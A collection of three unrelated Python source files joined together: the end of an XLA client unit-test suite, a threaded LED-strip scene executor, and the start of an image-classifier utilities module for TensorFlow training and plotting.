c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().Execute()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def DISABLED_testMapWithStaticOperands(self):
c = self._NewComputation()
factor = c.ConstantF32Scalar(3.0)
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32ByParamComputation(), [0],
static_operands=[factor])
self._ExecuteAndCompareClose(c, expected=[3.0, 6.0, 9.0, 12.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_numpy(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.Execute()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_numpy(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_numpy(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
if __name__ == "__main__":
unittest.main()
|
scene_executor.py
|
import threading
import time
from ws2812.scenes.WhiteLoading import WhiteLoading
class SceneExecutor:
def __init__(self):
self.thread_running = False
self.thread = None
self.led_count = None
self.frame_time = 0.5
self.step_size = 1
self.scene = WhiteLoading()
self.neopixel = None
def thread_func(self):
step = 0
while self.thread_running:
time_started = time.perf_counter()
colors = self.scene.do(step, self.led_count)
for idx, color in enumerate(colors):
self.neopixel[idx] = color
while time.perf_counter() - time_started < self.frame_time:
time.sleep(0.05)
self.neopixel.show()
step += self.step_size
def start(self, neopixel, led_count):
self.neopixel = neopixel
self.led_count = led_count
self.thread = threading.Thread(target=self.thread_func)
self.thread_running = True
self.thread.start()
def stop(self):
self.thread_running = False
def wait_for_stop(self):
self.thread.join()
self.thread = None
|
common.py
|
import cv2
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
import numpy as np
import os
import glob
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.python.keras import backend as K
import glob
import threading
import time
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from utils.confusion_matrix_pretty_print import plot_confusion_matrix_from_data
from screeninfo import get_monitors
def set_mixed_precision(policy_name='mixed_float16'):
tf_version=float('.'.join(tf.__version__.split('.')[:-1]))
if tf_version>=2.4:
tf.keras.mixed_precision.set_global_policy(policy_name)
else:
policy = tf.keras.mixed_precision.experimental.Policy(policy_name)
tf.keras.mixed_precision.experimental.set_policy(policy)
def move_plot_window_to_center(plt):
fig = plt.gcf()
size = fig.get_size_inches() * fig.dpi # size in pixels
mngr = plt.get_current_fig_manager()
try:
mngr.window.setGeometry(get_monitors()[0].width//2-size[0]//2, get_monitors()[0].height//2-size[1]//2, size[0], size[1])
except:
mngr.window.setGeometry=(get_monitors()[0].width//2-size[0]//2, get_monitors()[0].height//2-size[1]//2, size[0], size[1])
def clean_checkpoints_fn(checkpoints_dir):
max_keep_num = 5
while True:
checkpoints_list = glob.glob(os.path.join(checkpoints_dir, "*.index"))
if len(checkpoints_list) > max_keep_num:
sorted_by_mtime_ascending = sorted(checkpoints_list, key=lambda t: os.stat(t).st_mtime)
for i in range(len(checkpoints_list) - max_keep_num):
try:
os.remove(sorted_by_mtime_ascending[i])
os.remove(".".join(sorted_by_mtime_ascending[i].split('.')[:-1]) + ".data-00000-of-00001")
except:
pass
time.sleep(5)
def clean_checkpoints(checkpoints_dir):
x = threading.Thread(target=clean_checkpoints_fn, args=(checkpoints_dir,))
x.start()
def show_classes_hist(class_sizes,class_names):
plt.rcdefaults()
x_pos = np.arange(len(class_names))
plt.bar(x=x_pos,height=class_sizes,width=0.4,align="center")
# plt.ylabel(u'count')
plt.xlabel(u'class name')
plt.xticks(x_pos,class_names)
# plt.legend((rect,),(u"xxx",))
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("classes histogram")
plt.show()
def get_best_model_path(dir):
files = glob.glob(os.path.join(dir,"best_weight*"))
sorted_by_mtime_descending = sorted(files, key=lambda t: -os.stat(t).st_mtime)
if len(sorted_by_mtime_descending)==0:
return None
return '.'.join(sorted_by_mtime_descending[0].split('.')[0:-1])
def freeze_model(model, frozen=True):
model.trainable = not frozen
if isinstance(model, tf.keras.Model):
for l in model.layers:
freeze_model(l, frozen)
def plot_figures(figures, nrows = 1, ncols=1,window_title="training samples"):
"""Plot a dictionary of figures.
Parameters
----------
figures : <title, figure> dictionary
ncols : number of columns of subplots wanted in the display
nrows : number of rows of subplots wanted in the figure
"""
fig, axeslist = plt.subplots(ncols=ncols, nrows=nrows,dpi=180)
for ind,title in enumerate(figures):
axeslist.ravel()[ind].imshow(figures[title], cmap=plt.gray())
axeslist.ravel()[ind].set_title(title)
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title(window_title)
plt.show()
def show_training_images(generator,num_img=9):
prefix="img_"
figures={}
img_index=0
for index,(image,label) in enumerate(generator):
title=prefix+str(index)+":"+generator.class_names[np.argmax(label[0])]
figures[title]=image[0].astype(np.uint8)
img_index+=1
if img_index>=num_img:
break
# plot of the images
num_row=len(list(figures.keys()))//3
num_col=3
plot_figures(figures, num_row, num_col,window_title="training samples")
def get_confusion_matrix(dataset,model,save_dir=None):
pred_result = model.predict(dataset,verbose=1)
pred_cls = np.argmax(pred_result,axis=-1)
pred_scores = np.max(pred_result,axis=-1)
valid_img_path_list = dataset.img_path_list[dataset.valid_mask]
